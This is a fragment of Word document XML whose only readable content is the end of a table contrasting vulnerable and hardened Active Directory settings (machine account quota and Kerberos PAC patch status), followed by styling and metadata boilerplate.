          <w:p w14:paraId="2DE3145C" w14:textId="27140007" w:rsidR="0056544D" w:rsidRPr="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0056544D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ms-DS-MachineAccountQuota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B90E71C" w14:textId="679170F7"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Set to 10 (Any user can create 10 machines)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00FF0746" w14:textId="06480126"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Set to 0 (Only designated admins can create machines)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056544D" w14:paraId="1DEEE2F2" w14:textId="77777777" w:rsidTr="0056544D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6E5782" w14:textId="0846B907"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Patch Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="161FD638" w14:textId="7A39CBEE"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Missing KB5008383 / KB5008602 updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E69DA77" w14:textId="5E5E7540" w:rsidR="0056544D" w:rsidRPr="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0056544D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Patched; Kerberos PAC validations enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12281CB9" w14:textId="77777777" w:rsidR="0056544D" w:rsidRPr="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0056544D" w:rsidRPr="00565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4FDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E0F6F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B57AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="994C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649FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE900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92E49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FC43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FA65A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA5A7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F50A2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19961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747EFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D106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442F07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59A6CE5A"/>
    <w:lvl w:ilvl="0" w:tplc="FBDCDD08">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D911167"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7870B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2A7E88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C510830A"/>
    <w:lvl w:ilvl="0" w:tplc="3F4C93F6">
      <w:start w:val="1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F74289"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DA2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21377"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D32F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DD2F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99946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88201D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14F43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4789935">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2086686294">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1554465789">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="849176173">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="653876125">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="965550256">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2111126330">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2080713797">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="327372130">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1085227302">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="280189669">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="127600095">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1896502943">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="267810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92"/>
    <w:rsid w:val="001107BB"/>
    <w:rsid w:val="00153AF6"/>
    <w:rsid w:val="001C492D"/>
    <w:rsid w:val="0024425A"/>
    <w:rsid w:val="00294E91"/>
    <w:rsid w:val="00345479"/>
    <w:rsid w:val="00442C76"/>
    <w:rsid w:val="00556DCC"/>
    <w:rsid w:val="0056544D"/>
    <w:rsid w:val="00613A04"/>
    <w:rsid w:val="00676591"/>
    <w:rsid w:val="00681BC3"/>
    <w:rsid w:val="006D01FF"/>
    <w:rsid w:val="006D3130"/>
    <w:rsid w:val="006F4908"/>
    <w:rsid w:val="007D6E67"/>
    <w:rsid w:val="008157A1"/>
    <w:rsid w:val="008B6E55"/>
    <w:rsid w:val="009270EB"/>
    <w:rsid w:val="00941DF8"/>
    <w:rsid w:val="00A435E7"/>
    <w:rsid w:val="00AE37E5"/>
    <w:rsid w:val="00AF0660"/>
    <w:rsid w:val="00B47558"/>
    <w:rsid w:val="00B56192"/>
    <w:rsid w:val="00B72451"/>
    <w:rsid w:val="00BA13B0"/>
    <w:rsid w:val="00BE0FA4"/>
    <w:rsid w:val="00C943DC"/>
    <w:rsid w:val="00CC7646"/>
    <w:rsid w:val="00EB0454"/>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E9BA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{91DB1AA3-8B3A-4CF4-BE90-24E6F9D74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192"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B56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192"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00B56192"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B56192"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00B56192"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00B56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192"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00B56192"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B56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454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5479"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00556DCC"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00556DCC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00676591"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>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3512">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1906990867">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="357007102">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="495220114">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="629483120">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1641496925">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1449621653">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="725645249">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1772965665">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1988435976">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1844859521">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="14159778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518F9E3-5D76-4FA3-BB65-83FA1BEA6AE9}">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B59E8BC7-484D-4A6C-8161-5A1F9D1BFB5C}">
  <we:reference id="wa200000011" version="1.0.1.0" store="en-US" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA200000011" version="1.0.1.0" store="" storeType="OMEX"/>
  </we:alternateReferences>
  <we:properties>
    <we:property name="theme" value="&quot;Googlecod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960</TotalTime>
  <Pages>18</Pages>
  <Words>4952</Words>
  <Characters>28233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2026-06-22T08:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-26T20:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>